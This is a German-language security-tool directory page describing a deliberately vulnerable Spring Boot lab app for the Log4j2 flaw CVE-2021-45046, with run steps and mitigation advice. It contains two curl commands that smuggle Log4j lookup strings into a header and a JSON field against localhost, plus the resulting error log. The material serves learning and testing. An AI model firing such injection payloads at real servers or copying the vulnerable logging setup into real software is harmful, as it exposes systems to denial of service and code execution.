Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
log4j2-CVE-2021-45046 | Kitploit
Tools/GitHubGitHub/pravin-pp/log4j2-cve-2021-45046
SchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungLabs & Praxis
GitHubpravin-pp/log4j2-cve-2021-45046

log4j2-CVE-2021-45046

Repository anzeigen
vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Verwundbare Log4j2-Beispielanwendung (CVE-2021-45046)

Betroffene Versionen: alle Versionen von 2.0-beta9 bis 2.15.0

Diese Anwendung basiert auf einer Spring-Boot-Webanwendung, die für CVE-2021-45046 anfällig ist.

Sie verwendet Log4j 2.14.1 (über spring-boot-starter-log4j2 2.6.1).

Ausführen der Anwendung

Führen Sie sie aus:

root@kitploit:~
Importieren Sie das Projekt in einer Java-IDE als Maven-Projekt.

Führen Sie CVEMainApplication.java als Spring-Boot-App aus.

Schritte zur Ausnutzung

  • Lösen Sie dann den Exploit wie folgt aus:
root@kitploit:~
For GET ->
curl 127.0.0.1:8080 -H 'X-Api-Version: ${ctx:apiVersion}'


For Post request ->
curl --location --request POST 'http://127.0.0.1:8080/addrecord' \
--header 'Content-Type: application/json' \
--data '{
	"clientRef": "${ctx:clientRef}"
}'
  • Beachten Sie, dass die Ausgabe eine Endlosschleife anzeigt; in Tests wurde jedoch nicht festgestellt, dass dieser DoS ressourcenintensiv ist, da die Endlosschleife vom Programm erkannt wird und es mit einem Fehler abbricht:
root@kitploit:~

${ctx:clientRef}2021-12-15 19:27:50,212 http-nio-8080-exec-1 ERROR An exception occurred processing Appender LogToConsole java.lang.IllegalStateException: Infinite loop in property interpolation of  ${ctx:clientRef}: ctx:clientRef
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.checkCyclicSubstitution(StrSubstitutor.java:1081)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1029)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1042)
	

Gegenmaßnahmen :

  • Log4j 2.16.0 behebt dieses Problem, indem die Unterstützung für Message-Lookup-Muster entfernt und die JNDI-Funktionalität standardmäßig deaktiviert wird.
Tool herunterladen